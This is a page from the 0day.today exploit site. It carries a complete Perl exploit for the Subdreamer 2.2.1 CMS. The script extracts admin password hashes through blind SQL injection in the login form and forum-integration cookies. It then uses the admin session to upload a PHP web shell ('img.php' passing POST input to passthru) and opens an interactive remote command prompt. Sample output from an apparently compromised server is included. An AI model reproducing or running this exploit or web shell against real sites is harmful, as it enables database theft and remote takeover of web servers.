0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Subdreamer 2.2.1 SQL Injection / Command Execution Exploit
========================================================== Subdreamer 2.2.1 SQL Injection / Command Execution Exploit ========================================================== #!/usr/bin/perl ## Subdreamer 2.2.1 command exec exploit ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ## supported targets: ## ~ without forum integration ## ~ with phpBB2 integration ## ~ with ipb2 integration ## ~ with vbulletin2 integration ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ## (c)oded by 1dt.w0lf - 19/09/2005 ## RST/GHC ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ## work: ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ## r57subdreamer.pl -p http://subdreamer.com.ru/ -u 2 -t 1 ## ------------------------------------------------------------------ ## [~] PATH : http://subdreamer.com.ru/ ## [~] USER : 2 ## [~] TARGET : 1 - PhpBB2 ## [1] STEP 1 : TRY GET USER PASSWORD ## [~] SEARCHING PASSWORD ... [ DONE ] ## ----------------------------------------------------------- ## USER_ID: 2 ## PASS: 26310e438a5a1fb8622738f1e5d34f8b ## ----------------------------------------------------------- ## [2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE ## [+] DONE! THIS USER HAVE ACCESS! ## [3] STEP 3 : UPLOAD FILE ## [+] DONE! FILE "img.php" UPLOADED ## [+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =) ## SUBDREAMER# id; uname -a; ls -la; ## ---------------------------------------------------------------- ## uid=1003(apache) gid=1003(apache) groups=1003(apache) ## FreeBSD customer-3314.cit-network.net 5.3-RELEASE FreeBSD 5.3-RELEASE #0: ## Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 ## total 24 ## drwxrwxrwx 5 enshteyn apache 512 Sep 19 23:04 . ## drwxr-x--- 10 enshteyn apache 512 Sep 17 21:03 .. ## drwxr-xr-x 2 enshteyn apache 512 Sep 10 14:09 Image ## -rw-r--r-- 1 apache apache 48 Sep 19 23:04 img.php ## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 logos ## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 smilies ## ---------------------------------------------------------------- ## SUBDREAMER# exit ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ## config ## ------ ## ## images folder $img_folder = 'images'; ## or try ##$img_folder = 'images/logos'; ## ## end config use LWP::UserAgent; use HTTP::Cookies; use Getopt::Std; getopts('u:p:h:t:'); $path = $opt_p; $user = $opt_u; $hash = $opt_h; $target = $opt_t || 0; $s_num = 1; $|++; $n = 0; @targets = ( #['target name','colimn1 in database','colimn2 in database','cookie name 1','cookie name 2'] ['Subdreamer without forum','userid','password','sduserid','sdpassword'], ['PhpBB2','user_id','user_password','phpbb2mysql_data',''], ['IPB2','id','member_login_key','member_id','pass_hash'], ['PhpBB2 cookie injection','','','phpbb2mysql_data',''], ['IPB2 cookie injection','id','','member_id','pass_hash'], ['Vbulletin cookie injection','userid','','bbuserid','bbpassword'], ); if (!$path || !$user || $target<0 || $target>5) { &usage; } &head(); if($path=~/[^\/]$/) { $path .= '/'; } print "[~] PATH : $path\r\n"; print "[~] USER : $user\r\n"; print "[~] TARGET : $target - $targets[$target][0]\r\n"; if($target==1||$target==2||$target==0) { print "[1] STEP 1 : TRY GET USER PASSWORD\r\n"; if(!$hash){ print "[~] SEARCHING PASSWORD ... [|]"; FIND: while(1) { if(&found(47,58)==0) { &found(96,103); } $char = $i; if ($char=="0") { if(length($allchar) > 0){ print qq{\b\b DONE ] ----------------------------------------------------------- USER_ID: $user PASS: $allchar ----------------------------------------------------------- }; last FIND; } else { print "\b\b FAILED ]"; } exit(); } else { $allchar .= chr($char); } $s_num++; } } else { print "[~] SKIP. HASH EXISTS\r\n"; $allchar = $hash; } } print "[2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE\r\n"; if(&check_admin_rights()) { print "[+] DONE! THIS USER HAVE ACCESS!\r\n"; } else { print "[-] DAMN! THIS USER NOT ADMIN =(\r\n"; exit(); } print "[3] STEP 3 : UPLOAD FILE\r\n"; if(&upload_file()) { print "[+] DONE! FILE \"img.php\" UPLOADED\r\n"; } else { print "[-] DAMN! UPLOAD ERROR =(\r\n"; exit(); } print "[+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)\r\n"; while () { print "SUBDREAMER# "; while(<STDIN>) { $cmd=$_; chomp($cmd); exit() if ($cmd eq 'exit'); last; } &run($cmd); } sub found($$) { my $fmin = $_[0]; my $fmax = $_[1]; if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; } $r = int($fmax - ($fmax-$fmin)/2); $check = " BETWEEN $r AND $fmax"; if ( &check($check) ) { &found($r,$fmax); } else { &found($fmin,$r); } } sub crack($$) { my $cmin = $_[0]; my $cmax = $_[1]; $i = $cmin; while ($i<$cmax) { $crcheck = "=$i"; if ( &check($crcheck) ) { return $i; } $i++; } $i = 0; return $i; } sub check($) { $n++; status(); $ccheck = $_[0]; $username = "no_such_user' OR (".$targets[$target][1]."=".$user." AND (ascii(substring(".$targets[$target][2].",".$s_num.",1))".$ccheck.")) /*"; $xpl = LWP::UserAgent->new() or die; $res = $xpl->post($path.'index.php', { "loginusername" => $username, "loginpassword" => "nap0Jlb_Haxep", "login" => "login", "Submit now" => "Login" } ); @results = $res->content; foreach $result(@results) { if ($result =~ /(Database error)|(Invalid SQL)/i) { print "\r\n[-] SQL SYNTAX ERROR! CHECK TARGET!\r\n"; exit(); } #print $result; # english pattern if ($result =~ /Wrong Password/) { return 1; } # russian pattern if ($result =~ /...... ......./) { return 1; } # russian pattern 2 if ($result =~ /............ ....../) { return 1; } # russian pattern 3 ( KOI8-R tested on subdreamer.com.ru ) if ($result =~ /...... ......./) { return 1; } } return 0; } sub status() { $status = $n % 5; if($status==0){ print "\b\b/]"; } if($status==1){ print "\b\b-]"; } if($status==2){ print "\b\b\\]"; } if($status==3){ print "\b\b|]"; } } sub check_admin_rights() { $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new( ); $xpl->cookie_jar( $cookie_jar ); ($host = $path) =~ s!http://([^/]*).*!$1!; if($target == 1) { # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ??? #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,); # default phpbb2 cookie $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,); } elsif($target == 3) { # phpbb2 cookie with sql injection $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,); } elsif($target == 4) { # ipb2 cookie with sql injection $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,); $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,); } elsif($target == 5) { # Vbulletin cookie with sql injection $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,); $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,); } else { # subdreamer || ipb2 cookies $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,); $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,); } $res = $xpl->get($path."admin/index.php"); if($res->content =~ /loginpassword/) { return 0; } else { return 1; } } sub upload_file() { $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new( ); $xpl->cookie_jar( $cookie_jar ); ($host = $path) =~ s!http://([^/]*).*!$1!; if($target == 1) { # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ??? #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,); # default phpbb2 cookie $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,); } elsif($target == 3) { # phpbb2 cookie with sql injection $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,); } elsif($target == 4) { # ipb2 cookie with sql injection $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,); $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,); } elsif($target == 5) { # Vbulletin cookie with sql injection $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,); $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,); } else { # subdreamer || ipb2 cookies $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,); $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,); } $res = $xpl->post($path.'admin/imagemanager.php',Content_Type => 'form-data', Content => [ 'action' => 'uploadimage', 'folderpath' => "../$img_folder/", 'MAX_FILE_SIZE' => '1000000', 'image' => [ undef, 'img.php', Content_type => 'text/plain', Content => '<? if($_POST[cmd]) { passthru($_POST[cmd]); } ?>', ], 'submit' => 'Upload Image', ], ); if($res->content =~ /Settings Updated/) { return 1; } if($res->content =~ /Uploading Errors/) { return 0; } else { return 1; } } sub run() { $xpl = LWP::UserAgent->new() or die; $res = $xpl->post($path.$img_folder.'/img.php',{'cmd'=>$cmd}); print "----------------------------------------------------------------\r\n"; print $res->content; print "----------------------------------------------------------------\r\n"; } sub usage() { &head(); print q(| | | - Usage: | | r57subdreamer.pl -p <path> -u <user_id> [-t <target>] [-h <hash>] | | <path> - Path to subdreamer folder | | <user_id> - User id for bruteforce | | <hash> - MD5 password hash for this user if you have it =\) | | - Available targets: | | - brute password: | | 0 - Subdreamer without forum integration ( default ) | | 1 - Subdreamer with PhpBB2 integration | | 2 - Subdreamer with IPB2 integration | | - cookie sql injection, dont need brute password: | | 3 - Subdreamer with PhpBB2 integration 2 | | 4 - Subdreamer with IPB2 integration 2 | | 5 - Subdreamer with Vbulletin integration | +--------------------------------------------------------------------+ | e.g.: | | r57subdreamer.pl -p http://127.0.0.1/subdreamer/ -u 1 | | r57subdreamer.pl -p http://www.subdreamer.com.ru -u 2 -t 1 | +--------------------------------------------------------------------+ ); exit(); } sub head() { print q( +--------------------------------------------------------------------+ | Subdreamer version 2.2.1 sql injection + command execution exploit | | by 1dt.w0lf | | RST/GHC | +--------------------------------------------------------------------+ );} # 0day.today [2024-10-06] #